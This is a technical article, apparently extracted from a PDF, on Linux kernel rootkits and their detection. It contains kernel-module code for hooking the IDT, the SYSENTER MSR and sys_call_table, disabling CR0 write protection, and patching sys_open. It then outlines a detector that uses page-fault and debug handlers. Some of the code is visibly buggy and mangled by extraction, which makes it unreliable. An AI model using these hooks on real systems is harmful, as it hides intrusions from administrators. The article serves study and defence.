Kernel rootkits in Linux: low-level approach and prevention

Kernel rootkits in Linux: low-level approachand prevention

Ivan Galinskiy

This work is published under the BSD Documentation License. For thefull text of the license, see the “License” section.

1 A brief disclaimer

This work is mostly the result of learning system internals and my level ofknowledge was obviously lower when I started writing this article than whenI finished it. Thank you in advance for your understanding!

2 Kinds of rootkits

2.1 Classification

In the classification of malware, rootkits are programs designed to hide thefact of system intrusion by concealing processes, users, files etc. This is abasic definition, which is true for all kinds of rootkits. But looking at real lifeexamples, variations appear. For example, in most cases the rootkit is notjust “standalone”, but is a part of another piece of malware which is beinghidden. A good example would be Rustock.C designed for Windows.

2.2 Basic principles of work

The process of hiding something is based on modifying system “internals”,which requires some way to gain administrative (root) privileges. This can bedone in several different ways, but this is not the task of the rootkit itself, soit will not be reviewed. But there are basically two ways the rootkit sustainsitself on the main system:

1

1. Modifying files on the disk. When a program has administrative rightson the target machine, it can (almost always) do whatever it “wants”.For instance, modifying the passwd or sudo utilities will probably getusers’ passwords. The disadvantage is obvious - it’s easy to detect.To detect the rootkit, the user only needs to check main utilities’checksums using a trusted operating system (either by booting witha LiveCD or by taking the HDD mirror (in case of RAID) to anothermachine).

2. Modifying only the RAM. At first sight it may seem pointless, as ev-erything will return to normal after a reboot, but imagine what wouldhappen on a server with 2 years uptime. That’s why this type of rootk-its is relatively popular.

3 A brief look at DR Linux rootkit

This sample of malware is well known. Besides, it’s one of the most up-to-dateopen-source rootkits available. Others are either very old, or don’t match thiswork’s context, so we will not look at them. The source code indicates thatthis rootkit is based on debug registers. According to Intel documentation,the debug registers are given names from DR0 to DR7. DR0 - DR3 holdfour linear addresses (breakpoints’ addresses). DR4 and DR5 are reservedfor extended debugging, DR6 is the “Debug State Register” and DR7 is the“Debug Control Register”. What is their purpose? The scheme below fromIntel documentation explains some things. One of particular interest is the

31 24 23 22 21 20 19 16 15 1314 12 11 8 7 0

DR7L0

1234569101718252627282930

G0

L1

L2

L3

G3

LE

GE

G2

G1

0 0 GD

R/W0

LEN0

R/W1

LEN1

R/W2

LEN2

R/W3

LEN3

31 16 15 1314 12 11 8 7 0

DR6B0

123456910

B1

B2

B3

0 1 1 1 1 1 1 1 1 1BD

BS

BT

0 0 1

Reserved (set to 1)

DR7, which controls the debugging behavior. Its significance for the rootkitlies in its ability to control all types of access to the breakpoints. Obviously,the breakpoints are not useful by themselves. When a breakpoint is reached,

2

after executing it, the processor emits a #DB exception, which is caught bythe kernel handler in normal cases. But the rootkit can change the handler inInterrupt Descriptor Table to its own or either modifies the system handler(in this case the IDT remains untouched).

4 Interception techniques

More methods have been created over time, but all of them are based onmodifying well-known system structures, which are not so numerous, forexample debug registers (as seen above), IDT, MSR, syscall tables etc. Somedefinitions are provided below:

� IDT means Interrupt Descriptor Table. In simple words, it containsaddresses of handlers for interrupts. As was seen for the DR rootkit,it may be very useful. There is also another detail: before Pentium IIwas introduced, system calls in Linux (i.e. calls from user applicationsto kernel) were performed using the 0x80 interrupt (loading the systemcall number into EAX register before invoking interrupt). The pointerto the handler for that interrupt was stored in IDT too, leading to aneasy way to intercept system calls.

� MSR stands for Model Specific Registers. Again, before Pentium II,interrupts were used to make system calls. It was a simple way, but itshowed to be slow. That’s why SYSENTER/SYSCALL and SYSEXIT/SYSRET

(for Intel/AMD respectively) commands were introduced, providing afaster way to make system calls. Now the pointer to that handler ofthe call was not in IDT, but in a set of MSR registers. They storethe target instruction, stack segment pointer etc. But one of the mostimportant is the IA_32_SYSENTER_EIP which stores the target instruc-tion. Changing it to something else will redirect all the system callsinto the new procedure.

� Even more, a look to the system_call and ia32_sysenter_target

showed that both are accessing sys_call_table in order to perform aspecific system call (the instruction in particular was “call *sys_call_table(,%eax,4)”).Therefore, modifications to sys_call_table would affect all systemcalls, regardless of the way of invoking them, being an efficient methodin rootkit’s “arsenal”.

3

4.1 Modifying IDT

Other ways exist, of course, but the methods provided above are the “clas-sics” of interception and every one of them is worth a look, especially themethod of IDT modification:

� First of all, the code is going to be as independent of the kernel versionas it’s possible. It means that the resources available in the processorwill be used rather that predefined macros and functions. If the binarycode is not depending on a particular kernel version, it would be easierto spread without modifications.

� Before any changes to IDT can be made, its location is required. Theassembly command SIDT can help with this task by getting the IDTRregister contents. In 32-bit systems, IDTR contains two fields: the 16-bit limit, specifying the size of the table, and 32-bit address which is thelocation of IDT. Note: the address is stored with low-order bytes first.A function can be defined to get the register contents in easily-readableform (file sidt.h):

1 typedef struct {2 unsigned limit : 16 ;3 unsigned base_low : 16 ;4 unsigned base_high : 16 ;5 } __attribute__ ( ( __packed__ ) ) dtr ;6 // __packed__ is needed to avoid structure alignment ,

7 // otherwise it will not be suitable for use

8

9 dtr get_idtr ( void )10 {11 dtr idtr ;12 memset(&idtr , 0UL , sizeof ( dtr ) ) ;13

14 asm ("sidt %0 \n\t"

15 : "=m" ( idtr ) ) ;16

17 return idtr ;18 }

4

� Having the IDTR, we still need to get a particular entry in the IDT (tostore the original interrupt handler, for example). On 32-bit systems,each entry in IDT is 8-bytes long and consists of an offset to the handlerand some attributes. However, the offset is not continuous in the entry:the first 16 bits begin at bit 0 of the IDT entry and the last 16 are atthe end of the entry. The following code can handle this (file idt.h):

1 #include "sidt.h"

2

3 typedef struct

4 {5 unsigned offset_low : 16 ;6 unsigned not_used : 32 ; // We are not going to use that

7 unsigned offset_high : 16 ;8 } __attribute__ ( ( __packed__ ) ) idt_entry ;9

10 idt_entry* get_idt_entry ( dtr idtr , uint index )11 {12 idt_entry* entry = ( idt_entry *) ( ( idtr . base_high << 16) +13 idtr . base_low ) ;14 entry += index ;15 return entry ;16 }17

18 inline void* get_addr_from_entry ( idt_entry* entry )19 {20 return ( void ( * ) ) ( ( entry−>offset_high << 16) +21 entry−>offset_low ) ;22 }23

24 inline void modify_idt_entry_addr ( idt_entry* entry , void* new_addr )25 {26 __asm__ ("cli\n\t" ) ;27 entry−>offset_high = ( uint32_t ) new_addr >> 16 ;28 entry−>offset_low = ( uint32_t ) new_addr & 0x0000ffff ;29 __asm__ ("sti\n\t" ) ;30 }31

32 inline void* get_idt_handler_addr ( uint index )

5

33 {34 return get_addr_from_entry ( get_idt_entry ( get_idtr ( ) ,35 index ) ) ;36 }

� After these operations, the IDT modification is a relatively simple taskand is not described here.

4.2 SYSENTER/SYSCALL interception

As it was already told, beginning with Pentium II, Intel processors imple-mented the new SYSENTER/SYSEXIT instructions (and AMD used SYSCALL/SYSRET).They decreased the overhead of switching from user mode and vice-versa(the interrupts being slow). These instructions used special MSR registers toknow where the target procedure was located. There is one that is speciallyrelevant: SYSENTER_EIP_MSR. Its contents are loaded to the EIP register(basically a jump) at the end of SYSENTER execution. Initially it points to akernel procedure, but that can be changed:

� First, a way to access the SYSENTER_EIP_MSR register is needed. It’snot accessed like, for example, the EAX register. There is a specialinstruction, RDMSR, that does it, the only requirement is the number ofMSR register to be loaded into ECX (the number of SYSENTER_EIP_MSRis 0x176). The contents are then stored in EDX and EAX registers(EDX is 0 on 32-bit systems).

� The process of assigning a new value to SYSENTER_EIP_MSR is basicallyan inverted version of the above. The new value is loaded into EDX:EAX

(EDX is zero, EAX is the new procedure pointer), the MSR register num-ber into ECX, the instruction WRMSR is executed in the end.

� An example would be more helpful than a dry description, so here isa minimal sample kernel module for this task. It’s a kernel modulebecause WRMSR can only be performed at ring 0 (file msr.h):

1 #include <l i nux /module . h>2 #include <l i nux / ke rne l . h>3

4 void (* old_handl_p ) ( void ) = 0 ;

6

5 void (* new_handl_p ) ( void ) = 0 ;6

7 void hook ( void )8 {9 /* Pointer to the original handler */

10 asm ("jmp *%0" : : "m" ( old_handl_p ) ) ;11 return ;12 }13

14 int init_module ( void )15 {16 new_handl_p = &hook ;17

18 asm ("rdmsr\n\t"19 : "=a" ( old_handl_p ) /* EAX now has a pointer to the hook */

20 : "c" (0 x176 ) /* Number of MSR register */

21 : "%edx" ) ; /* RDMSR also changes the EDX register */

22

23 asm ("wrmsr\n\t"24 : /* No output */

25 : "c" (0 x176 ) , "d" (0x0 ) , "a" ( new_handl_p ) ) ;26

27 return 0 ;28 }29

30 void cleanup_module ( void )31 {32 asm ("wrmsr\n\t"33 : /* No output */

34 : "c" (0 x176 ) , "d" (0x0 ) , "a" ( old_handl_p ) ) ;35 }

� This module doesn’t do anything special, it’s basically a “proof-of-concept”, though the “payload” is relatively easy to add.

5 Designing a rootkit

The most popular methods of intercepting system internals have been re-viewed, but these are also comparatively easy to detect. Usually the check

7

consists of retrieving the system structures, registers etc. and comparingthem to the original ones found in an uncompressed kernel (or the System.mapfile in case of addresses of special procedures). The results of such a checkcan’t be trusted though. Newer rootkits prefer to modify the system handlersthemselves instead, becoming more difficult to discover. For example, belowis the method for debugging registers (it’s simpler than other), but made ina new way.

5.1 Modifying the original debug handler

1. When a breakpoint is reached, the 0x1 interrupt is activated. Theaddress of that interrupt handler can be retrieved from the IDT.

2. The address will vary from kernel to kernel, but on a particular virtualGNU/Linux installation (kernel 2.6.33), the address 0xc125af80 wasfound. According to the System.map file, this address corresponded tothe function “debug”. This function was located (kernel 2.6.33) in thearch/x86/kernel/entry_32.S file:

1 ENTRY ( debug )2 RING0_INT_FRAME

3 cmpl $ia32_sysenter_target ,(%esp )4 jne debug_stack_correct

5 FIX_STACK 12 , debug_stack_correct , debug_esp_fix_insn

6 debug_stack_correct :7 pushl $−1 # mark this as an int

8 CFI_ADJUST_CFA_OFFSET 49 SAVE_ALL

10 TRACE_IRQS_OFF

11 xorl %edx ,%edx # error code 012 movl %esp ,%eax # pt_regs pointer

13 call do_debug

14 jmp ret_from_exception

15 CFI_ENDPROC

16 END ( debug )

The “call do_debug” seems to be the call to the “real” debug handler.Therefore, changing this call will make the interception possible. Theonly requirement is the location of that instruction.

8

3. It should be good to see a part of disassembled listing of “debug”:

1 c125afc7 : 31 d2 xor %edx ,%edx

2 c125afc9 : 89 e0 mov %esp ,%eax

3 c125afcb : e8 7c 96 da ff call 0xc100464c4 c125afd0 : e9 67 80 da ff jmp 0xc100303c

But a little detail appears there. As the hex code of “call” in thiscase is 0xe8, it’s a “relative near” call, so first the absolute offset of“do_debug” needs to be calculated. Just for clarity: the 4-byte valueafter “0xe8 is a signed integer. The offset is added to the address ofthe next instruction, in this case 0xc125afd0, and the linear address of“do_debug” is obtained. But first, this call should be found. Accord-ing to the objdump listing provided above, the 4-byte pattern neededis 0xd289e0e8. Digging in the kernel is hard for a human, so anotherfunction is provided: (file search.h). Important: when a value frommemory is obtained in order to use it as an integer, it’s inverted (be-cause of the endianness). So if code needs to be found to find code, thepattern should be inverted again:

1 void* search ( uint8_t* base , uint32_t pattern , uint limit )2 {3 /* Reversing the byte order in the pattern, because int is

4 stored reversed, but we need to find straight patterns*/

5 uint32_t pattern_reversed = ( pattern << 24) + ( pattern >> 24) +6 ( ( pattern & 0x0000ff00 ) << 8) +7 ( ( pattern & 0x00ff0000 ) >> 8 ) ;8

9 int c ;10 for (c=0; c < limit ; c++)11 {12 /* We add c bytes to the pointer, convert it to uint_32

13 and then compare (if found, we add 4 so it points to

14 the next byte) */

15 uint8_t* base_cur = base + c ;16 if (* ( ( uint32_t * ) ( base_cur ) ) == pattern_reversed )17 return ( void * ) ( base_cur + 4 ) ;18 }

9

19

20 /* Nothing found */

21 return ( void * ) 0 ;22 }

WARNING: It’s not the best or the fastest code, but considering that itwill usually be called only once, it’s not critical

Well, this is a good technique, but, unfortunately, easily detectable becauseof the easy way to access DR0-DR7 registers. Instead, a little bit morecomplicated, but more reliable (in terms of ease of discovery) method ofhijacking system calls will be used: modifying the sys_call_table directly.

� The responsible code, found both in system_call and ia32_sysenter_target

(what additionally proves that the system calls are located in the sametable), is call *sys_call_table(,%eax,4). This is the disassembledfragment of ia32_sysenter_target:

1 c10031ca : 3d 51 01 00 00 cmp $0x151 ,%eax

2 c10031cf : 0f 83 4e 01 00 00 jae 0xc10033233 c10031d5 : ff 14 85 b0 d2 25 c1 call *−0x3eda2d50 ( ,%eax , 4 )

However, a bug in the objdump led to a negative address value in thatcall (and the address in that case is absolute), but it’s not critical atall.

� Now the function “search”, defined above, can be used to search thepattern 0x00ff1485 (taken from the disassembly listing), and that ishow the address of sys_call_table is obtained.

� The offset of a particular entry is still required. There is a useful file inkernel sources that contains all of the syscalls’ offsets: arch/x86/kernel/syscall_table_32.S.A small fragment of that file is provided below:

1 ENTRY ( sys_call_table )2 /* 0 - old "setup()" system call, used for restarting */

3 . long sys_restart_syscall /* 0 */

4 . long sys_exit

5 . long ptregs_fork

10

6 . long sys_read

7 . long sys_write

8 . long sys_open /* 5 */

9 . long sys_close

10 . long sys_waitpid

11 . long sys_creat

12 . long sys_link

13 . long sys_unlink /* 10 */

14 /* Many more entries (like 300)... */

� And now, that all the required information is available, the patching canbe performed. The modification of sys_open should be a good example.First, a function to find sys_call_table and an inline function to reada particular entry can be defined in order to simplify the operations(filesyscall.h):

1 void* find_sys_call_table ( void )2 {3 void* ia32_sysenter_target_p = 0 ;4 void* sys_call_table_p = 0 ;5 void* sys_call_table_pp = 0 ;6

7 asm ("rdmsr\n\t"8 : "=a" ( ia32_sysenter_target_p )9 : "c" (0 x176 )10 : "%edx" ) ;11

12 /* This is technically a pointer to a pointer */

13 sys_call_table_pp =14 search ( ( uint8_t *) ia32_sysenter_target_p , 0x00ff1485 , 5 12 ) ;15

16 /* Convert to uint32_t , read (32 bits) and convert obtained

17 value to void* */

18 sys_call_table_p =19 ( void *) (* ( ( uint32_t *) sys_call_table_pp ) ) ;20

21 return sys_call_table_p ;22 }23

11

24 void* read_sys_call_entry ( void* sys_call_table , int index )25 {26 void* entry_p = sys_call_table + 4 * index ;27 uint32_t entry = * ( ( uint32_t *) entry_p ) ;28 return ( void *) entry ;29 }

� When all the necessary addresses are obtained, sys_open can be “patched”.In this case, it was easier to read the disassembled listing of sys_openthan searching through the kernel source. Also, the function is not verybig, so the complete listing is provided:

1 c10b040c : 57 push %edi2 c10b040d : b8 9c ff ff ff mov $0xffffff9c ,%eax

3 c10b0412 : 56 push %esi4 c10b0413 : 53 push %ebx5 c10b0414 : 8b 7c 24 10 mov 0x10(%esp ) ,%edi

6 c10b0418 : 8b 74 24 14 mov 0x14(%esp ) ,%esi

7 c10b041c : 8b 5c 24 18 mov 0x18(%esp ) ,%ebx

8 c10b0420 : 89 fa mov %edi ,%edx

9 c10b0422 : 89 f1 mov %esi ,%ecx

10 c10b0424 : 53 push %ebx11 c10b0425 : e8 dd fe ff ff call 0xc10b030712 c10b042a : 5a pop %edx13 c10b042b : 5b pop %ebx14 c10b042c : 5e pop %esi15 c10b042d : 5f pop %edi16 c10b042e : c3 ret

It’s small, basically a kind of wrapper. Pay attention to the “call 0xc10b0307”(0xe8 opcode, meaning another relative offset). In the test system, thisaddress represented the function “do_sys_open”.

� At that moment, it’s only a question of technique to hook sys_open.After that, by using the function search, a pointer to the beginning ofthe address (or better said, relative offset) is obtained. This offset isstored as a signed integer, and the address of the next instruction is ob-tained by adding 4 (4 bytes) to the pointer. Then the offset is added tothat pointer and that is how the absolute offset of “do_sys_open” is ob-

12

tained. However, the pages that contain this code are write-protected,so an attempt to write there will cause an exception and nothing more.But there is the WP bit in CR0 register which enables/disables writeprotection, and it can be used in the following helper function (filerw_protect.h):

1 void rw_protection_set ( bool enabled )2 {3 int32_t cr0 ;4 asm ("mov %%cr0, %0\n\t"

5 : "=r" ( cr0 ) ) ;6

7 if ( enabled )8 cr0 |= (1 << 16 ) ;9 else

10 cr0 &= ˜(1 << 16 ) ;11

12 asm ("mov %0, %%cr0\n\t"

13 :14 : "r" ( cr0 ) ) ;15 return ;16 }

The complete module code will look like this (file open_hook.c):

1 void (* do_sys_open ) ( void ) = 0 ;2

3 void hook ( void )4 {5 asm ("jmpl *%0"

6 : /* No output */

7 : "m" ( do_sys_open ) ) ;8 return ;9 }

10

11 int init_module ( )12 {13 void* sys_call_table = 0 ;14 void* sys_open_p = 0 ;

13

15

16 void* do_sys_open_rel_p = 0 ;17 int32_t do_sys_open_rel = 0 ;18

19 int32_t new_offset = 0 ;20

21 sys_call_table = find_sys_call_table ( ) ;22 sys_open_p = read_sys_call_entry ( sys_call_table , 5 ) ;23

24 do_sys_open_rel_p = search ( ( uint8_t *) sys_open_p ,25 ( uint32_t )0 x89f153e8 , 6 4 ) ;26 do_sys_open_rel = * ( ( int32_t *) do_sys_open_rel_p ) ;27

28 do_sys_open = ( void *) ( ( uint32_t ) do_sys_open_rel_p + 4 +29 do_sys_open_rel ) ;30

31 new_offset = ( int32_t )32 ( ( uint32_t ) hook − ( ( uint32_t ) do_sys_open_rel_p + 4 ) ) ;33

34 rw_protection_set ( false ) ;35

36 asm ("mov %%eax, (%%ebx)\n\t"

37 :38 : "a" ( new_offset ) , "b" ( do_sys_open_rel_p ) ) ;39

40 rw_protection_set ( true ) ;41

42 return 0 ;43 }44

45 void cleanup_module ( ){}

� Now this hook can be modified in such a way that it will block accessto, for example, all the filenames ending with “st”. It’s not particu-larly useful but illustrates the concept. But as we are replacing thedo_sys_open call, we will take the do_sys_open definition in kernelsources as a base for our hook. So the modified hook looks like this(file open_hook_inter.c):

14

1 long hook ( int dfd , const char *filename , int flags , int mode )2 {3 asm ("pusha\n\t" ) ;4 char* p = filename ;5 while (*p != '\0' ) p++; // Find the end of the string

6

7 if (* (p−1) != 't' && *(p−2) != 's' ) // Check its ending

8 {9 asm ("popa\n\t" ) ;

10 asm ("jmpl *%0\n\t"

11 : /* No output */

12 : "m" ( do_sys_open ) ) ;13 }14 asm ("popa\n\t" ) ;15 return −1; // Simulation of an error

16 }

Don’t pay attention to the strange way of checking filename ending.The reason for this is that the name is provided to open in differentways, and that function then calls getname to determine the completefilename, but I will not go into the details now, because I was onlyshowing the technique itself.

6 Detection

Now that the basic principles are known, it’s possible to develop an applica-tion that will detect hijacking attempts before any damage can be done to theOS and possibly discover existing rootkits. The functions of that improvised“IDS” will be the following:

1. At startup, read the GDTR, IDTR, SYSENTER_EIP_MSR registers.

2. Retrieve the values of debugging registers and, if a “suspicious” valueis found, do something.

3. Retrieve the #PF interrupt handler. A good technique of hiding some-thing is by clearing the P flag of that “something”. The page will looklike it’s not present in the memory and the #PF exception will beraised, which is then caught by the handler. The handler itself can bemalicious, permitting it to intercept.

15

4. Retrieve ia32_sysenter_target and system_call in order to com-pare them to the version found in vmlinux.

5. Retrieve GDT. The rootkit may add descriptors with base not equalto zero and use them in order to make the disassembly much morecomplicated, but becoming more detectable.

6. Retrieve sys_call_table, all the system calls, the IDT and the inter-rupt handlers.

7. Clear the P flag on some “attractive” system structures and set a newhandler for #PF. Why the P flag instead of debugging registers? Well,the debugging registers can be modified very easily, that’s the reason.It’s more complicated, of course, but gives more reliability. Here I amgoing to use predefined kernel functions and macros to ensure compat-ibility and portability.

It might be better to first make the IDT handlers’ comparison function.But there is a little thing about finding the end of the interrupt handler,because a disassembler engine will be needed. This time I am going to usea disassembler engine called “hde32”, written by Vyacheslav Patkov. It’ssimple and small enough for the tasks present in this work (others disasmengines were having too much dependencies). The usage example is providedbelow (file idt_compare.h):

1 #include "hde28c/hde32.c"

2

3 typedef struct

4 {5 uint16_t offset_low ;6 uint32_t not_used ; /* We are not going to use that */

7 uint16_t offset_high ;8 } __attribute__ ( ( __packed__ ) ) idt_entry ;9

10 void get_idt_addresses ( int32_t* buffer , idt_entry* idt )11 {12 for ( int i = 0 ; i <= 255 ; i++)13 {14 *( buffer + i ) =15 ( ( idt + i)−>offset_high << 16) + ( idt + i)−>offset_low ;

16

16 }17

18 return ;19 }20

21 void* get_function_end ( char* beginning )22 {23 hde32s instr ; // Instruction structure

24 unsigned int length = 0 ;25

26 while ( instr . opcode != 0xC3 | | instr . opcode != 0xCB | | // ret

27 instr . opcode != 0xCF ) // iret

28 {29 beginning += length ;30 length = hde32_disasm ( beginning , &instr ) ;31 }32

33 return ( void *) beginning ;34 }

Now that the basic usage was provided, it might be better to try to solvea more interesting problem: the “P-flag interception”. That method is allabout the modification of page table entries, and there are functions andmacros provided by the kernel, especially in the arch/x86/include/asm/pgtable.hfile: pte_set_flags and pte_clear_flags which take a pte_t argumentand the flags to set/clear and the functions to calculate the position of apage table entry. However, these functions don’t modify the actual entries,so there is another function: set_pte for that. In order to modify the Pflag, the position of the entry in the global dir is calculated, the same thingis done with the upper dir and that process continues until the page tableentry is found. It may sound complicated,but it’s not, as all the macros aredefined in kernel headers. A header file containing the required functions willbe like that (file pg_flag_mod.h):

1 #include <l i nux /mm. h>2 #include "rw_protect.h"

3

4 // pte_set_flags and pte_clear_flags don't actually change any system

5 // structures , they only provide you with the modified copies of

17

6 // entries. set_pte is the function that modifies the structures

7

8 inline void set_present ( pte_t* ptep )9 {10 rw_protection_set ( false ) ;11 set_pte (ptep , pte_set_flags (*ptep , _PAGE_PRESENT ) ) ;12 rw_protection_set ( true ) ;13 }14

15 inline void clear_present ( pte_t* ptep )16 {17 rw_protection_set ( false ) ;18 set_pte (ptep , pte_clear_flags (*ptep , _PAGE_PRESENT ) ) ;19 rw_protection_set ( true ) ;20 }21

22 pte_t* virt_to_pte ( unsigned int addr )23 {24 pgd_t pgd = __pgd ( 0 ) ;25 pud_t* pud = 0 ;26 pmd_t* pmd = 0 ;27

28 pgd = __pgd ( native_read_cr3 ( ) + pgd_index ( addr ) ) ;29 pud = pud_offset(&pgd , addr ) ;30 pmd = pmd_offset (pud , addr ) ;31 return pte_offset_kernel (pmd , addr ) ;32 }

Of course, just altering the page table is not enough, so we will need to putour own handler to the page fault exception. The code that puts an “empty”handler that does nothing except invoking the original one will look like that:(file fault_handl_emp.c):

1 #include <l i nux /module . h>2 #include <l i nux / ke rne l . h>3 #include "sidt.h"

4 #include "idt.h"

5

6 void* old_page_fault = 0 ;7

18

8 void new_page_fault ( void )9 {10 __asm__ ("jmpl *%0\n\t"

11 :12 : "m" ( old_page_fault ) ) ;13 }14

15 int init_module ( )16 {17 old_page_fault = get_addr_from_entry ( get_idt_entry ( get_idtr ( ) , 0x0e ) ) ;18 modify_idt_entry_addr ( get_idt_entry ( get_idtr ( ) , 0x0e ) , &new_page_fault ) ;19

20 return 0 ;21 }22

23 void cleanup_module ( )24 {25 modify_idt_entry_addr ( get_idt_entry ( get_idtr ( ) , 0x0e ) , old_page_fault ) ;26 }

It’s still needed to know where did the #PF exception occur and who causedit. The EIP and CS registers hold the address of the instruction where theexception occurred, but they are stored in stack. The sequence of actions inthis case will be the following:

1. Access the values stored in the stack (but not pop them).

2. Obtain the address of the instruction that caused #PF and get thatinstruction.

3. See the address that instruction was accessing to, using the CR2 register.

4. If the address is the one is observed, check the address of that instruc-tion and see if that instruction (more exactly, the section of memoryto which that instruction belongs) is allowed to access that page.

5. If it does, set the P flag and set a breakpoint to the next instruction.

6. Catch the 0x01 (debug) exception and clear the P flag again.

And in that way it’s possible to know who accesses critical system struc-tures and have the possibility to stop these intentions if they are not permit-ted. This piece of code should complete the task:

19

1 #include <l i nux /module . h>2 #include <l i nux / ke rne l . h>3 #include <l i nux / s t r i n g . h>4 #include <l i nux / s l ab . h>5 #include <asm/ uacce s s . h>6 #include "hde28c/hde32.c"

7

8 #include "pg_flag_mod.h"

9 #include "sidt.h"

10 #include "idt.h"

11 #include "addr_list.h"

12

13 // By some reasons that code existed in the headers,

14 // but wasn't recognized by the linker

15 int kern_ptr_validate ( const void *ptr , unsigned long size )16 {17 unsigned long addr = ( unsigned long ) ptr ;18 unsigned long min_addr = PAGE_OFFSET ;19 unsigned long align_mask = sizeof ( void *) − 1 ;20

21 if ( addr < min_addr )22 return 0 ;23 if ( addr & align_mask )24 return 0 ;25 return 1 ;26 }27

28 // The old handlers

29 void *old_page_fault = 0 ;30 void *old_debug = 0 ;31

32 // The address to which the code tried to access

33 uint32_t accessed_addr = 0 ;34

35 uint32_t old_dr0 = 0 ;36 uint32_t old_dr7 = 0 ;37

38 // A flag needed by the debug handler to

39 // know what is happening.

40 uint8_t protected_page_accessed = 0 ;

20

41

42 // Buffers needed for disassembly

43 hde32s instr_disasm ;44 char instruction_buf_p [ 8 ] ;45

46 struct addrs_list protected_addresses ;47

48 typedef struct{49 void* eip ;50 uint16_t cs ;51 } __attribute__ ( ( __packed__ ) ) stack_top ;52

53 stack_top* page_fault_stack_top = 0 ;54

55 void new_debug ( void )56 {57 if ( protected_page_accessed )58 {59 __asm__ ("pusha\n\t" ) ;60 protected_page_accessed = 0 ;61

62 // Clear the debug status register

63 set_debugreg (0 , 6 ) ;64 set_debugreg ( old_dr7 , 7 ) ;65

66 // Now we close access to that page again

67 clear_present ( virt_to_pte ( accessed_addr ) ) ;68

69 // Removing the breakpoint

70 set_debugreg ( old_dr0 , 0 ) ;71 set_debugreg ( old_dr7 , 7 ) ;72 __asm__ ("popa\n\t"73 "iret\n\t" ) ;74 }75 else

76 {77 __asm__ ("popa\n\t" // Restoring the registers for normal operation

78 "jmpl *%0\n\t"

79 : // No output

80 : "m" ( old_debug ) ) ;

21

81 }82 }83

84 void new_page_fault ( void )85 {86 // Here we point our structure to the stack in order to get

87 // the EIP and CS registers

88 __asm__ ("movl %%esp, %0" : "=m" ( page_fault_stack_top ) ) ;89

90 __asm__ ("pusha\n\t" ) ;91

92 // I decided to use the macros in order to not assign an additional

93 // variable for something that already exists

94 #define eip page_fault_stack_top−>eip95 #define cs page_fault_stack_top−>cs96

97 // Now we retrieve the linear address to which the

98 // rootkit/kernel tried to access

99 accessed_addr = native_read_cr2 ( ) ;100

101 // And here we get the instruction itself

102 if (cs == __USER_CS && access_ok ( VERIFY_READ , eip , 8 ) )103 {104 copy_from_user(&instruction_buf_p , eip , 8 ) ;105 }106 else if ( ( cs == __KERNEL_CS ) && kern_ptr_validate (eip , 8 ) )107 {108 memcpy(&instruction_buf_p , eip , 8 ) ;109 }110

111 // The disassembly is performed here in order to see the

112 // command's length

113

114 hde32_disasm(&instruction_buf_p , &instr_disasm ) ;115

116 // Write something here

117 if ( address_in_list(&protected_addresses , ( void *) accessed_addr )118 && (( uint32_t ) eip >> 24) <= 0xc1 )119 {120 // Here we set up the debugging register

22

121 // to stop at the next instruction

122 // in order to clear the P flag again

123 // and save the previous value of DR0.

124 get_debugreg ( old_dr0 , 0 ) ;125 get_debugreg ( old_dr7 , 7 ) ;126

127 set_debugreg ( ( uint32_t ) eip + instr_disasm . len , 0 ) ;128 set_debugreg ( old_dr7 & ˜(3 << 16) , 7 ) ;129

130 // Now we open access to the requested page

131 set_present ( virt_to_pte ( accessed_addr ) ) ;132 protected_page_accessed = 1 ;133

134 // Here we return from the exception handler,

135 // the command executes , the breakpoint is activated ,

136 // the P flag is cleared again

137 __asm__ ("popa\n\t"138 "iret\n\t" ) ;139 }140

141 else __asm__ ("popa\n\t" // Restoring the registers for normal operation

142 "jmpl *%0\n\t"

143 : // No output

144 : "m" ( old_page_fault ) ) ;145

146 // A little cleanup

147 #undef eip

148 #undef cs

149

150 }151

152 int init_module ( )153 {154 protected_addresses . last = 0 ;155 memset(&instr_disasm , 0UL , sizeof ( hde32s ) ) ;156 memset(&instruction_buf_p , 0UL , 8 ) ;157

158 old_page_fault = get_addr_from_entry ( get_idt_entry ( get_idtr ( ) , 0x0e ) ) ;159 old_debug = get_addr_from_entry ( get_idt_entry ( get_idtr ( ) , 0x01 ) ) ;160

23

161 // Setting the new handler

162 modify_idt_entry_addr ( get_idt_entry ( get_idtr ( ) , 0x0e ) , &new_page_fault ) ;163 modify_idt_entry_addr ( get_idt_entry ( get_idtr ( ) , 0x01 ) , &new_debug ) ;164

165 // Here we'll clear the P flag on some pages

166 //add_address(&protected_addresses , (void*)0xc10f4640);

167 //clear_present(virt_to_pte(0xc10f4640));

168

169 return 0 ;170 }171

172 void cleanup_module ( )173 {174 // Here we'll set the P flag on some pages

175 // TODO

176 set_present ( virt_to_pte (0 xc10f4640 ) ) ;177 modify_idt_entry_addr ( get_idt_entry ( get_idtr ( ) , 0x0e ) , old_page_fault ) ;178 modify_idt_entry_addr ( get_idt_entry ( get_idtr ( ) , 0x01 ) , old_debug ) ;179 }

However, this method would be useless if the original #PF handler was mod-ified. Thankfully, it’s impossible to set the P flag in the page fault handler(it would be a recursive page fault then), that’s why it is safe to retrieve thehandler directly. Here is the function that retrieves IDT handlers’ bodies(file get_idt_handl.h):

1 #include "idt_compare.h"

2

3 void get_function_body ( void* buffer , void* func )4 {5 void* func_end = 0 ;6 unsigned func_size = 0 ;7

8 func_end = get_function_end ( ( char *) func ) ;9 func_size = ( unsigned ) func_end − ( unsigned ) func ;

10

11 memcpy ( buffer , func , func_size ) ;12 }13

14 inline void get_idt_handler_body ( void* buffer , unsigned index )

24

15 {16 get_function_body ( buffer , get_idt_handler_addr ( index ) ) ;17 }

OK, here I stop. Other items from the list were either done previously in thework or are very similar to the ones already described.

7 A brief conclusion

I described the techniques usually deployed by the rootkits in order to re-main undetected, yet many more remain. There are still some things leftundescribed , and hopefully I will add them in the future. However, in-spired by my work, I decided to write a rootkit detector, called kmrd (kernelmode rootkit detector). Once I make a working version, the website will bepublished here.

8 Special thanks and sources

First of all, the article that inspired me to go inside the Linux kernel wasthe article “In search of the invisible hat” by Kris Kaspersky. Now, Iwant to thank everyone who helped me with this work, especially usersof kernelnewbies IRC channel, inhabitants of linux.org.ru and users ofgcc-help mailing list. Special thanks to Vyacheslav Patkov, who wrote thehde32 disassembler engine and to the user hazel from linuxforums for help-ing me to smooth out the English of this work! The list of websites used:

1. lxr.linux.no

2. wiki.osdev.org

3. www.phrack.com

9 License

Redistribution and use in source (LaTeX format) and ’compiled’ forms (PDF,PostScript, HTML, RTF, etc), with or without modification, are permittedprovided that the following conditions are met:

25

1. Redistributions of source code (LaTeX format) must retain the abovecopyright notice, this list of conditions and the following disclaimer.

